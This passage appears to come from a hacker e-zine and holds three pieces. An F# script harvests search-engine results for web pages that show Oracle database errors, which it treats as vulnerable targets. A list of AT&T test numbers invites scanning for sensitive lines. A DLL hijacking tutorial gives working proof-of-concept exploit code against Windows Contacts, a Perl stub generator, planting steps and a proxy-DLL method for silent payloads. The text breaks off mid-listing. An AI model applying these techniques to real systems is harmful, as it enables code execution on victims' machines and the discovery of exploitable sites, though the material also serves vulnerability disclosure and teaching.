the Shortcut Key in Properties to be CTRL+ALT+F so I can quickly access the
F# REPL at any time.
Okay, now onto how GNY-SID.fsx itself works:
*)
(*%*%*%* GNY-SID.fsx by duper for GNY *%*%*%*)
// Open the standard .NET namespaces we'll be accessing
open System
open System.Net
open System.Web
open System.Text
open System.Text.RegularExpressions
// This namespace is exclusive to F# .. you can tell by the name ;)
open Microsoft.FSharp.Control.WebExtensions
// The first part of the search engine's CGI URL for finding web pages
let theUrl = [ "http://search.yahoo.com/search?p=" ]
// This will eventually be URL-encoded and appended to the URL above..
// It's the actual "dork" search string..
let ad0rq = [ "warning ociexecute \"on line\"" ]
// Extract matched subexpression strings (i.e., vulnerable web site URI's)
let rec printRegexMatches (m : Match) =
let matchString = m.Groups.[1].Value.ToString()
if not(matchString.Length.Equals(0)) then
match m.Success with
| true -> matchString :: printRegexMatches(m.NextMatch())
| _ -> []
else
[]
(* This is a tail-recursive function including the regular expression that
matches the vulnerable web pages returned by the search engine. Obviously,
if the search engine changes the formatting of its output HTML, then this
regexp needs to be changed as well. Ideally, we would have access to a SOAP
web service or RSS/ATOM feed where the XML formatting is guaranteed. *)
let printPageMatches(htm : string) =
let re = new Regex("<h3><a class=\"yschttl spt\" href=\"(http[^\"]+)\" data")
printRegexMatches(re.Match(htm))
// This function returns an asynchronous workflow allowing more than one search
// request to be conducted at a time, e.g. a simple parallelism of web requests.
let fetchAsync (url : string) =
let html = ""
async {
let webClient = new WebClient()
let searchUrl = (new StringBuilder()).Append(url).Append(HttpUtility.UrlEncode(ad0rq.Head))
let! html = webClient.AsyncDownloadString(new Uri(searchUrl.ToString()))
Console.WriteLine(printPageMatches(html)) // Display output
}
// Put everything together..
let runAll () =
theUrl
|> Seq.map fetchAsync
|> Async.Parallel
|> Async.RunSynchronously
// ..and run it!
runAll();;
[==================================================================================================]
-=[ 0x05 Test Numbers
-=[ Author: storm
-=[ Email: storm@gonullyourself.org
-=[ Website: http://gonullyourself.org/
After doing some extensive Google dorking of the AT&T website, I came across quite a number of
documents containing lists of test numbers. The following numbers are from documents pertaining to
the Dallas, Houston, and Beaumont regions of Texas. All numbers listed have been confirmed as
active at the time of this issue's release. As milliwatts and certain other test numbers are of
little direct use to anyone who is not a field technician, one may instead take the opportunity to
scan their respective ranges in hope of discovering sensitive and interesting numbers.
Descriptions of test numbers are courteously provided by AT&T:
"102-type milliwatt provides connection to a 1004 HZ power source (milliwatt) required for one-way
transmission testing. Typical features are:
- off-hook supervision
- 175 millisecond delay
- 1004 HZ at a reference level
- 1 second interval of on-hook supervision, without tone, every 10 seconds until released
- idle circuit termination during on-hook
Fixed PADs (TP2, TP9) and PAD switching signals are included in the test line, when required, to
furnish proper reference level at switch."
102-type (Milliwatt)
------------
214-220-0029
214-421-6276
214-489-4250
214-553-0587
214-599-9723
214-746-6309
214-821-2759
281-342-9699
281-346-1399
281-351-1499
281-353-1899
281-356-1499
281-367-1899
281-373-0904
281-376-1499
281-437-1899
281-444-1899
281-445-0125
281-449-1899
281-452-1899
281-456-0080
281-463-1899
281-464-9999
281-471-1499
281-482-1499
281-487-1899
281-489-7499
281-492-1899
281-497-4004
281-498-1499
281-592-1499
281-876-1405
409-245-0917
409-245-0930
409-245-1272
409-384-1200
409-385-1109
409-547-2278
409-746-2401
409-755-0809
409-763-3100
409-836-0538
409-836-1222
409-836-5416
409-866-9111
409-882-8301
409-899-9921
409-938-3241
409-945-8894
713-222-1099
713-433-3499
713-462-1499
713-522-3499
713-532-9999
713-571-9999
713-626-1499
713-638-4097
713-638-4098
713-651-9299
713-661-0088
713-723-2499
713-741-1499
713-771-6099
713-861-1793
713-871-0199
713-928-9020
713-946-1499
713-991-1499
832-242-9999
903-367-7528
903-378-7047
903-496-2607
903-560-1710
903-786-6237
903-873-2785
972-218-0916
972-224-5053
972-225-1399
972-226-3181
972-230-7828
972-241-7355
972-248-5052
972-270-9032
972-286-6419
972-287-1086
972-293-3731
972-308-0013
972-329-1900
972-335-7989
972-347-3264
972-370-0055
972-382-3257
972-472-6426
972-474-8703
972-479-0064
972-483-6122
972-515-3011
972-524-8151
972-542-2213
972-552-1009
972-635-0034
972-709-0277
972-722-8083
972-723-0019
972-782-8696
972-831-8042
972-875-3160
972-923-0047
972-980-4071
979-732-5646
979-885-3780
"105-type (local and toll) provides access to a far-end automatic transmission measuring system
(ATMS) responder. Two-way transmission, noise and gain-slope measurements may be made between the
far-end responder under control of automatically or manually directed test equipment."
105-type
------------
281-209-9999
281-342-9599
281-343-1998
281-346-1866
281-351-7121
281-353-2199
281-356-1330
281-367-2199
281-373-0907
281-376-1552
281-437-7429
281-442-2199
281-443-6932
281-444-0970
281-445-1009
281-458-1811
281-463-1199
281-469-2112
281-471-0851
281-474-3233
281-482-2199
281-486-1428
281-489-0044
281-492-1199
281-495-1999
281-497-4005
281-592-4199
281-876-1406
409-384-4639
409-724-3106
409-735-5392
409-762-7098
409-866-9296
409-899-9923
409-938-3238
409-945-8890
409-959-1050
409-971-2406
409-983-3102
409-983-3105
713-223-8847
713-451-2199
713-462-6399
713-472-0037
713-491-9987
713-522-3199
713-571-9997
713-626-1734
713-641-4899
713-651-9799
713-672-9202
713-681-1299
713-682-1499
713-729-2799
713-733-3910
713-741-8566
713-757-9912
713-790-1062
713-861-7399
713-871-1199
713-928-9021
713-946-8506
713-972-1080
713-981-1799
713-991-3728
832-251-0007
972-292-2125
972-734-3006
"108-type non-inverting loopback test line provides for digital testing capabilities between digital
exchanges and/or digital PBXs. The digital loopback test line provides a dialable, 4-wire test line
capability; it consists of circuitry that accepts and loops back received octets which are
retransmitted so that the positions of the bits within the octets are preserved."
108-type (Echo)
------------
281-227-9998
281-280-0034
281-320-0689
281-343-0785
281-346-2144
281-351-5445
281-356-1810
281-362-0684
281-373-0098
281-399-1580
281-440-1161
281-445-1195
281-471-0060
281-489-3122
281-497-4544
281-593-1299
281-876-1938
409-384-4311
409-763-8270
409-883-3099
409-895-0036
409-933-1301
409-945-8731
409-985-2911
713-472-0122
713-491-9995
713-522-2148
713-571-9998
713-621-2390
713-626-0666
713-638-4059
713-651-1443
713-681-9929
713-690-9987
713-721-1297
713-747-0047
713-757-9913
713-794-0484
713-861-0281
713-910-4522
832-251-0008
Silent lines go off-hook and remain silent until the calling party ends the call. They are
generally used to gauge the amount of line noise present. While there were no silent lines listed,
a few of the numbers must have been converted since.
Silent
------------
281-331-2297
281-437-2498
281-463-1012
281-484-6006
409-980-0450
713-433-3599
713-461-0501
972-747-9999
The following numbers were marked as test numbers but have either died or been assigned to other
purposes:
Incorrect
------------
214-375-9999 - VMB (469-855-9941)
214-398-5209 - HELO
214-429-9999 - VMB
214-465-9999 - "The feature you are attempting to use is either not recognized on this system is or
not currently available for you to use" - 1-800-331-0500 (Message 8; CT01UN)
214-623-9999 - "It is not necessary to dial a 1 or 0 when calling this number"
214-654-9308 - DISCO
214-845-9999 - "Either the number you dialed is not a working number or must be dialed with the
correct area code plus seven digits"
214-951-9999 - DISCO or NIS
214-987-3711 - DISCO
281-331-2009 - CBCAD (119T)
281-341-9499 - DISCO or NIS
281-458-8499 - reorder
281-479-1899 - DISCO or NIS
281-479-2199 - reorder
281-485-4304 - answering machine
281-485-6686 - fax
281-487-2299 - DISCO or NIS
281-488-1499 - DISCO or NIS
281-492-0652 - answering machine
281-498-0733 - DISCO or NIS
281-585-6649 - "not a working number" (Message 3; CT01UN)
281-689-2714 - DISCO or NIS
281-689-3123 - DISCO or NIS
281-825-1000 - VMB
281-938-3241 - CBCAD (119T)
409-233-1330 - reorder
409-234-2063 - ACB (119T)
409-234-7903 - reorder
409-234-7912 - CBCAD (?? 3)
409-239-3188 - Verizon Wireless "changed, DISCO, or NIS" (Announcement 2; switch 12-4)
409-239-3193 - Verizon Wireless "changed, DISCO, or NIS" (Announcement 2; switch 12-4)
409-265-0316 - reorder
409-265-0325 - reorder
409-265-5512 - CBCAD (119T)
409-279-5153 - reorder
409-279-6999 - reorder
409-279-9520 - reorder
409-291-0054 - HELO
409-291-8327 - apartment complex
409-336-8332 - CBCAD (119T)
409-336-8372 - reorder
409-398-2071 - reorder
409-398-2510 - reorder
409-398-5089 - CBCAD (119T)
409-532-0041 - NIS
409-532-1660 - NIS
409-532-2386 - NIS
409-543-1582 - "temporarily NIS" (Message 3; Switch 60)
409-543-8109 - HELO
409-543-8134 - "The number or code you have dialed is incorrect. Please check the number or code and
try again." (Message 7; Switch 60)
409-560-3978 - CBCAD (119T)
409-560-3994 - reorder
409-564-0258 - CBCAD (119T)
409-598-2242 - reorder
409-598-2405 - reorder
409-598-2547 - reorder
409-724-3102 - DISCO or NIS
409-729-9908 - ring out to "Your party is not answering. Please try your call later. We're sorry,
but your call will now be disconnected." (038T)
409-735-2199 - DISCO or NIS
409-736-0179 - busy
409-736-1828 - "we're sorry, your call cannot be completed to the access code you selected. Please
check the code and dial again or call your long-distance company for assistance."
409-737-2668 - "not a working number" (Message 3; CT01UN)
409-738-2025 - doesn't even ring
409-740-3566 - CBCAD (092T)
409-740-8925 - reorder
409-740-8933 - CBCAD (003T)
409-752-3881 - DISCO or NIS
409-752-5680 - DISCO or NIS
409-769-1109 - DISCO or NIS
409-826-3150 - CBCAD (119T)
409-826-4869 - reorder
409-826-6600 - reorder
409-848-0692 - reorder
409-848-2309 - CBCAD (119T)
409-848-2317 - CBCAD (119T)
409-857-3400 - reorder
409-866-0691 - ring out to "Your party is not answering. Please try your call later. We're sorry,
but your call will now be disconnected." (038T)
409-882-8303 - doesn't even ring
409-922-8179 - reorder
409-963-2359 - "we're sorry, your call cannot be completed to the access code you selected. Please
check the code and dial again or call your long-distance company for assistance."
409-999-9999 - CBCAD (119T)
713-221-1678 - ring out, no bridge
713-271-1299 - DISCO or NIS
713-453-8599 - DISCO or NIS
713-467-0599 - DISCO or NIS
713-468-2099 - DISCO or NIS
713-469-1499 - Verizon Wireless "not available at this time" (Announcement 1; switch 12-3)
713-472-5199 - busy
713-474-2199 - DISCO or NIS
713-641-4799 - CBCAD (119T)
713-661-3099 - DISCO or NIS
713-663-1599 - DISCO or NIS
713-671-0140 - does not accept blocked Caller ID
713-672-1499 - "not a working number" (Message 3; CT01UN)
713-692-2199 - HELO
713-692-7099 - CBCAD (013T)
713-734-4399 - reorder
713-790-1799 - ring out, no bridge
713-884-1000 - "not a working number" (Message 3; CT01UN)
713-972-1194 - DISCO
903-327-9999 - CBCAD (119T)
903-441-9999 - HELO
903-467-9999 - VMB (not set up yet)
903-626-4085 - DISCO
936-349-9999 - DISCO or NIS (Brookvale? 2)
972-266-9999 - "Either the number you dialed is not a working number or must be dialed with the
correct area code plus seven digits"
972-352-9999 - NIS (Message TX09080656)
972-570-9999 - DISCO or NIS
972-837-2119 - "Either the number you dialed is not a working number or must be dialed with the
correct area code plus seven digits"
972-924-2095 - "Either the number you dialed is not a working number or must be dialed with the
correct area code plus seven digits"
[==================================================================================================]
-=[ 0x06 Practical DLL Hijacking
-=[ Author: storm
-=[ Email: storm@gonullyourself.org
-=[ Website: http://gonullyourself.org/
Table of Contents
I. Introduction
II. Threat or No Threat?
III. Background on DLL Hijacking
IV. Developing a Proof of Concept
V. Real-World Attack Examples
VI. Omg Hax
I. Introduction
===============
A recent craze has been forming over a new attack vector known as "DLL hijacking." This paper is
meant to inform the reader about what exactly this attack vector is, how it works, and how to
develop a proof of concept exploit for it. I will also be covering some more advanced topics, such
as how DLL hijacking may be used in a practical manner to deliver malicious payloads, and I will
also introduce a new utilization of this attack to silently execute code on a remote system.
II. Threat or No Threat?
========================
There has been a lot of discussion about whether or not DLL hijacking actually presents any sort of
security risk, and at first look, one may agree that these concerns hold some merit. In a typical
scenario, an attacker would already need to possess a significant level of access to the target
machine and its filesystem in order to perform a hijack, so the question remains that if such a
level of access has already been achieved, then why would time and resources be wasted on a DLL
hijack? Instead, an attacker would probably have the power to simply tamper with the targeted
program itself or execute a downloaded binary with the same user permissions.
If an average DLL hijacking scenario doesn't grant escalated privileges to an attacker, then what
the heck use is it? DLL hijacking is appropriate in situations where an attacker does not have
actual interactive access to a target system but is still able to pass files to it, such as when a
user downloads content through BitTorrent or plugs in a USB thumb drive. In both of these
situations, DLL files may be planted on a system in specific relation to other key files in the
absence of the attacker maintaining any interactive access to the machine at all. When executed
properly, this attack is very effective and very dangerous. DLL hijacking won't bring about the
destruction of all computing as the media generally makes any vulnerability out to be (I'm assuming
it won't), but it certainly has its place as a valid security concern that must be addressed.
In any regard, the vendors seem to be taking it seriously:
From: "Adobe PSIRT" <psirt@adobe.com>
Subject: Adobe Report
Date: Mon, August 30, 2010 11:26 am
To: "storm@gonullyourself.org" <storm@gonullyourself.org>
Cc: "Adobe PSIRT" <psirt@adobe.com>
Hello sToRm,
We noticed you posted a report on the Exploit database about an issue affecting an
Adobe product: Adobe Photoshop CS2 DLL Hijacking Exploit (Wintab32.dll),
http://www.exploit-db.com/exploits/14741. We are currently investigating how to
resolve the issue. We definitely appreciate your feedback about the security of our
products, and encourage you to contact us directly in the event you find any further
issues, or have additional information you would like to share about the issue
already reported. Please contact us at PSIRT@adobe.com.
Thank you very much,
Wendy
Adobe Product Security Incident Response Team
III. Background on DLL Hijacking
================================
First, let's answer the question of what a DLL file is. Basically, DLL files (the acronym stands
for "dynamic-link library") are Windows's version of shared libraries, which are packages of
different subroutines that grant greater functionality to programs. Directly quoting a Microsoft
article, "For example, in Windows operating systems, the Comdlg32 DLL performs common dialog box
related functions." Numerous DLL files exist, each providing unique functionality. To cite another
example, when loaded by a program, the wsock32.dll file offers an interface to the Windows Sockets
API.
Above, I mentioned that DLL files are shared libraries, not static libraries. This is a key piece
of information in the context of our attack. To further explain, shared libraries are loaded at
run-time, unlike static libraries which are loaded at compile-time. The functionality provided by
static libraries is compiled directly into the binary itself, whereas the functionality provided by
shared libraries is compiled separately and copied into memory once loaded by the program. By using
shared libraries, the overall program size decreases since the executable is only storing a table of
required functions instead of the actual functions themselves. This process is referred to as
dynamic linking.
Dynamic linking offers many advantages over static linking (which you may have figured the
definition of already), just as static linking offers many advantages over dynamic linking. For
instance, as previously stated, dynamic linking decreases the overall size of the final executable.
Shared libraries may also be easily updated without the need for recompiling the affected program.
Additionally, dynamic linking promotes the reusage of code and allows such libraries to be called
upon by multiple programs at the same time. Quoting the book "An Introduction to GCC: for the GNU
compilers gcc and g++," "Most operating systems also provide a virtual memory mechanism which allows
one copy of a shared library in physical memory to be used by all running programs, saving memory as
well as disk space." Dynamic linking provides both efficient usage of resources and flexibility in
programming.
This flexibility, however, is what causes programs to be vulnerable to DLL hijacking. When
specifying a DLL file to be loaded by a program, a programmer has various options. First, s/he may
call the library using an absolute path, such as "C:\Windows\system32\wsock32.dll". Second, s/he
may call the library using a relative path, such as "..\..\Windows\system32\wsock32.dll". Third,
s/he may call the library simply by defining "wsock32.dll" with no path. This third option is of
particular interest to us due to the way Windows attempts to locate DLL files with no definite
path.
The following lists are from various Microsoft KB articles and the ACROS Security Blog. Asterisks
denote families of functions.
When the LoadLibrary* functions are evoked, the following locations are searched for the requested
file:
1. The directory from which the application loaded
2. The system directory
3. The 16-bit system directory
4. The Windows directory
5. The current working directory (CWD)
6. The directories that are listed in the PATH environment variable
When the SeachPath, CreateProcess*, and LoadModule functions are evoked, the following locations are
searched for the requested file:
1. The directory from which the application loaded
2. The current working directory (CWD)
3. The system directory
4. The 16-bit system directory
5. The Windows directory
6. The directories that are listed in the PATH environment variable
When the ShellExecute* functions are evoked, the following locations are searched for the requested
file:
1. The current working directory (CWD)
2. The 32-bit System directory (Windows\System32)
3. The 16-bit System directory (Windows\System)
4. The Windows directory (Windows)
5. The directories in the PATH environment variable
6. The directories specified in the App Paths registry key
When the WinExec function is evoked, the following locations are searched for the requested file:
1. The directory from which the application loaded.
2. The current working directory (CWD)
3. The Windows system directory. The GetSystemDirectory function retrieves the path of this
directory.
4. The Windows directory. The GetWindowsDirectory function retrieves the path of this
directory.
5. The directories listed in the PATH environment variable.
When the _spawn*p* and _exec*p* functions are evoked, the following locations are searched for the
requested file:
1. The current working directory (CWD)
2. The 32-bit system directory (Windows\System32)
3. The Windows directory (Windows)
4. The directories in the PATH environment variable
You may have already formulated an idea about what can happen here. If a DLL file is loaded by
means of the third path, then there is a good chance that the load function is searching a few other
directories before finding it. If an attacker places a DLL file containing malicious code in a
directory that is searched before the correct one is, then it will be loaded (with privileges of the
calling progam) instead of the real DLL, leading to arbitrary code execution. This is a DLL
hijacking attack.
IV. Developing a Proof of Concept
=================================
It is fairly simple to develop a working exploit for DLL hijacking. In this section, I will guide
you through the process of finding a vulnerable application, identifying hijackable DLL files, and
creating your own DLL files to be hijacked. For the scope of this tutorial, I will target
Microsoft's Windows Contacts program (tested on Vista SP2 and 7 Ultimate).
First, download and extract Process Monitor (available at [1]), which we will use to track the
filesystem activity of Windows Contacts. After opening it, add the following filters:
Process Name is wab.exe then Include
Path ends with .dll then Include
Result is NAME NOT FOUND then Include
Doing this restricts the program's output just to what we are interested in (requests to load
nonexistent DLL files by wab.exe).
Create an empty file named "test.wab", where .wab is a file extension associated with Windows
Contacts. Double-click on test.wab, which will open the Windows Contacts program. Scrolling down,
you should see something similar to the following events:
wab.exe CreateFile C:\Program Files\Windows Mail\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\System32\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\system\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Users\storm\Desktop\New Folder\Windows Contacts\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Program Files\Windows Mail\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Perl\site\bin\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Perl\bin\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Program Files\PHP\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\System32\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\System32\wbem\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\System32\WindowsPowerShell\v1.0\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\wbin\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Program Files\Nmap\wab32res.dll NAME NOT FOUND
This string of failed attempts to load a single DLL file is what we are looking for. First, the
directory that wab.exe was executed from is checked for wab32res.dll, where it is not found. Next,
it checks three Windows directories, where it is also not found. Then, it checks the current
working directory (where the .wab file was loaded from), and then, finally, it enumerates PATH as a
last resort. By observing this trend, we can assume that the program attempts to load wab32res.dll
using either the LoadLibrary or LoadLibraryEx method.
In case you are interested, by removing the "NAME NOT FOUND" filter, you can see all requests to
load DLL files, successful or not. By doing so, we can see that Windows Contacts was ultimately
successful in loading wab32res.dll a little further down:
wab.exe CreateFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS
wab.exe QueryBasicInformationFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS
wab.exe CloseFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS
wab.exe CreateFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS
wab.exe CreateFileMapping C:\Program Files\Common Files\System\wab32res.dll FILE LOCKED WITHONLY
READERS
wab.exe CreateFileMapping C:\Program Files\Common Files\System\wab32res.dll SUCCESS
wab.exe Load Image C:\Program Files\Common Files\System\wab32res.dll SUCCESS
wab.exe CloseFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS
So, now that we've identified wab32res.dll as a viable point of attack, the next step is to craft
our own DLL file. Since we've deduced that the DLL file is being loaded with one of the LoadLibrary
functions, we can employ the help of the DllMain callback function. We know this because, according
to [2], "When the system starts or terminates a process or thread, it calls the entry-point function
for each loaded DLL using the first thread of the process. The system also calls the entry-point
function for a DLL when it is loaded or unloaded using the LoadLibrary and FreeLibrary functions."
This means that the contents of DllMain() in our code will be executed upon loading of the DLL
file.
The following code is directly from the KB article just mentioned:
BOOL WINAPI DllMain(
__in HINSTANCE hinstDLL,
__in DWORD fdwReason,
__in LPVOID lpvReserved
);
So let's use this code and actually make it do something. The classic proof of concept is to
execute Calculator:
/*
Exploit Title: Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)
Date: August 25, 2010
Author: storm (storm@gonullyourself.org)
Tested on: Windows Vista SP2
http://www.gonullyourself.org/
gcc -shared -o wab32res.dll Contacts-DLL.c
.contact, .group, .p7c, .vcf, and .wab files are affected.
*/
#include <windows.h>
int hax()
{
WinExec("calc", 0);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
hax();
return 0;
}
Here, we have the DllMain() function call hax(), which simply executes calc.exe and exits. In case
you're wondering, you can determine which file extensions are associated with which programs through
Control Panel > Default Programs.
Compile and put your new wab32res.dll in the same directory as any .contact, .group, .p7c, .vcf, or
.wab file. The file can be empty - just as long as it has one of those file extensions. Open the
file, and you should see a Calculator window open. :)
We are done with the proof of concept process for this program. However, if the targeted program
does not load a DLL using a LoadLibrary function, then we are not able to use DllMain() to execute
our code. If this is the case, then we must construct our new DLL file in a different manner. We
must create a template of every export function provided by the real DLL file, but instead of the
actual functionality, each function simple runs our hax() function.
For this example, I will use rpawinet.dll, which is loaded insecurely by Live! Cam Avatar Creator
(CrazyTalk4 for short). It's essentially some useless program that came pre-installed on my
computer, so I figured I would utilize it somehow.
First, download and extract DLL Export Viewer from [3]. Run the program, and load the DLL file you
wish to examine (in this case, rpawinet.dll). A list of the export functions should display in the
window. Ctrl+A to select all, and Ctrl+S to save to a text file. The contents of the text file
should look something like:
==================================================
Function Name : HttpFilterBeginningTransaction
Address : 0x100011d0
Relative Address : 0x000011d0
Ordinal : 1 (0x1)
Filename : rpawinet.dll
Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
Type : Exported Function
==================================================
==================================================
Function Name : HttpFilterClose
Address : 0x100011dd
Relative Address : 0x000011dd
Ordinal : 2 (0x2)
Filename : rpawinet.dll
Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
Type : Exported Function
==================================================
==================================================
Function Name : HttpFilterOnBlockingOps
Address : 0x100011ea
Relative Address : 0x000011ea
Ordinal : 3 (0x3)
Filename : rpawinet.dll
Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
Type : Exported Function
==================================================
==================================================
Function Name : HttpFilterOnResponse
Address : 0x100011f7
Relative Address : 0x000011f7
Ordinal : 4 (0x4)
Filename : rpawinet.dll
Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
Type : Exported Function
==================================================
==================================================
Function Name : HttpFilterOnTransactionComplete
Address : 0x10001204
Relative Address : 0x00001204
Ordinal : 5 (0x5)
Filename : rpawinet.dll
Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
Type : Exported Function
==================================================
==================================================
Function Name : HttpFilterOpen
Address : 0x10001211
Relative Address : 0x00001211
Ordinal : 6 (0x6)
Filename : rpawinet.dll
Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
Type : Exported Function
==================================================
Using a simple Perl script, we can enumerate the function names in this text file and output them in
correct format for our DLL source.
use strict;
use warnings;
open FILE, '<', @ARGV or die $!;
print "#include <windows.h>\n#define DllExport __declspec (dllexport)\n\n";
while (<FILE>) {
print "DllExport void $1() { hax(); }\n" if ($_ =~ /Function Name\s+: (\w+)/);
};
print "\nint hax()\n{\n WinExec(\"calc\", 0);\n exit(0);\n return 0;\n}";
This should output:
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void HttpFilterBeginningTransaction() { hax(); }
DllExport void HttpFilterClose() { hax(); }
DllExport void HttpFilterOnBlockingOps() { hax(); }
DllExport void HttpFilterOnResponse() { hax(); }
DllExport void HttpFilterOnTransactionComplete() { hax(); }
DllExport void HttpFilterOpen() { hax(); }
int hax()
{
WinExec("calc", 0);
exit(0);
return 0;
}
I think you know what to do from here. :)
If you are interested, HD Moore has written a DLL hijacking auditing kit that automates checking
every associated file extension on one's computer to find potential program vulnerabilities. You
can find this tool at [4].
V. Real-World Attack Examples
=============================
There are many avenues for DLL hijacking that turn a number of seemingly safe activities into
potential security threats. I myself will not go too deeply into this section simply because other
articles have done a good job describing the vulnerable scenarios, so I will instead provide a guide
to these resources.
The article "Exploiting DLL Hijack in the real world" at [5] (mirror: [6]) provides a few good
examples of possible attack scenarios. The main points of the article are "Using a SMB/WebDav
shared folder," "A compressed package (.zip, .tar.gz, .rar etc)," "Torrents," and "Exploiting
multiple application hijacks."
The article "New DLL Hijacking Exploits (many!)" at [7] steps through an example WebDAV attack using
Metasploit. "Autorun DLL Hijacker (USB stick)" at [8] attempts to compormise a system through the
AutoRun feature of USB thumb drives.
On another note, we only covered creating proof of concept DLLs that don't really do much. Also,
since we are either removing the functionality of the export functions or the actual export
functions themselves, the hijacked program is going to crash if we remove the "exit(0);" line.
Let's learn how to execute our payload while still maintaining the functionality of the original DLL
file, effectively creating a silent attack.
We will achieve this through the use of a "proxy DLL." A proxy DLL is exactly what it sounds like -
a DLL file that acts as an intermediary to another DLL file. These are used to intercept and alter
program calls, most commonly to add "extra functionality" to games. For this quick section, I'll be
referencing the article [9] as our method of creating proxy DLL files. The source wrappit.cpp [10]
is provided by the article to automate the process, which you can instead download from [11] to
avoid the mandatory registration bullshit.
As I am still unfamiliar with the true power of proxy DLLs, I will only introduce you to this
concept and recommend you to guide yourself through the process by reading the documentation linked
above. The CodeProject article does a pretty good job explaining how to use the tool. Make sure
that the appropriate development environment is installed (I am using Microsoft Visual C++ Express).
I will use the example wsock32.dll as in the article:
C:\Users\storm\Desktop\src>"C:\Program Files\Microsoft Visual Studio 10.0\VC\bin\vcvars32.bat"
Setting environment for using Microsoft Visual Studio 2010 x86 tools.
C:\Users\storm\Desktop\src>dumpbin /exports C:\Windows\System32\wsock32.dll > exports.txt
C:\Users\storm\Desktop\src>type exports.txt
Microsoft (R) COFF/PE Dumper Version 10.00.30319.01
Copyright (C) Microsoft Corporation. All rights reserved.
Dump of file C:\Windows\System32\wsock32.dll
File Type: DLL
Section contains the following exports for WSOCK32.dll
00000000 characteristics
4A5BC955 time date stamp Mon Jul 13 19:55:01 2009
0.00 version
1 ordinal base
1142 number of functions
75 number of names
ordinal hint RVA name
1141 0 AcceptEx (forwarded to MSWSOCK.AcceptEx)
1111 1 EnumProtocolsA (forwarded to MSWSOCK.EnumProtocolsA)
1112 2 EnumProtocolsW (forwarded to MSWSOCK.EnumProtocolsW)
1142 3 GetAcceptExSockaddrs (forwarded to MSWSOCK.GetAcceptExSockaddrs)
1109 4 GetAddressByNameA (forwarded to MSWSOCK.GetAddressByNameA)
1110 5 GetAddressByNameW (forwarded to MSWSOCK.GetAddressByNameW)
1115 6 GetNameByTypeA (forwarded to MSWSOCK.GetNameByTypeA)
1116 7 GetNameByTypeW (forwarded to MSWSOCK.GetNameByTypeW)
1119 8 GetServiceA (forwarded to MSWSOCK.GetServiceA)
1120 9 GetServiceW (forwarded to MSWSOCK.GetServiceW)
1113 A GetTypeByNameA (forwarded to MSWSOCK.GetTypeByNameA)
1114 B GetTypeByNameW (forwarded to MSWSOCK.GetTypeByNameW)
24 C MigrateWinsockConfiguration (forwarded to MSWSOCK.MigrateWinsockConfigurat
ion)
1130 D NPLoadNameSpaces (forwarded to MSWSOCK.NPLoadNameSpaces)
1117 E SetServiceA (forwarded to MSWSOCK.SetServiceA)
1118 F SetServiceW (forwarded to MSWSOCK.SetServiceW)
1140 10 TransmitFile (forwarded to MSWSOCK.TransmitFile)
500 11 WEP (forwarded to ws2_32.WEP)
102 12 WSAAsyncGetHostByAddr (forwarded to ws2_32.WSAAsyncGetHostByAddr)
103 13 WSAAsyncGetHostByName (forwarded to ws2_32.WSAAsyncGetHostByName)
105 14 WSAAsyncGetProtoByName (forwarded to ws2_32.WSAAsyncGetProtoByName)
104 15 WSAAsyncGetProtoByNumber (forwarded to ws2_32.WSAAsyncGetProtoByNumber)
107 16 WSAAsyncGetServByName (forwarded to ws2_32.WSAAsyncGetServByName)
106 17 WSAAsyncGetServByPort (forwarded to ws2_32.WSAAsyncGetServByPort)
101 18 WSAAsyncSelect (forwarded to ws2_32.WSAAsyncSelect)
108 19 WSACancelAsyncRequest (forwarded to ws2_32.WSACancelAsyncRequest)
113 1A WSACancelBlockingCall (forwarded to ws2_32.WSACancelBlockingCall)
116 1B WSACleanup (forwarded to ws2_32.WSACleanup)
111 1C WSAGetLastError (forwarded to ws2_32.WSAGetLastError)
114 1D WSAIsBlocking (forwarded to ws2_32.WSAIsBlocking)
1107 1E WSARecvEx (forwarded to MSWSOCK.WSARecvEx)
109 1F WSASetBlockingHook (forwarded to ws2_32.WSASetBlockingHook)
112 20 WSASetLastError (forwarded to ws2_32.WSASetLastError)
115 21 WSAStartup (forwarded to ws2_32.WSAStartup)
110 22 WSAUnhookBlockingHook (forwarded to ws2_32.WSAUnhookBlockingHook)
1000 23 WSApSetPostRoutine (forwarded to ws2_32.WSApSetPostRoutine)
151 24 __WSAFDIsSet (forwarded to ws2_32.__WSAFDIsSet)
1 25 accept (forwarded to ws2_32.accept)
2 26 bind (forwarded to ws2_32.bind)
3 27 closesocket (forwarded to ws2_32.closesocket)
4 28 connect (forwarded to ws2_32.connect)
1106 29 dn_expand (forwarded to MSWSOCK.dn_expand)
51 2A gethostbyaddr (forwarded to ws2_32.gethostbyaddr)
52 2B gethostbyname (forwarded to ws2_32.gethostbyname)
57 2C gethostname (forwarded to ws2_32.gethostname)
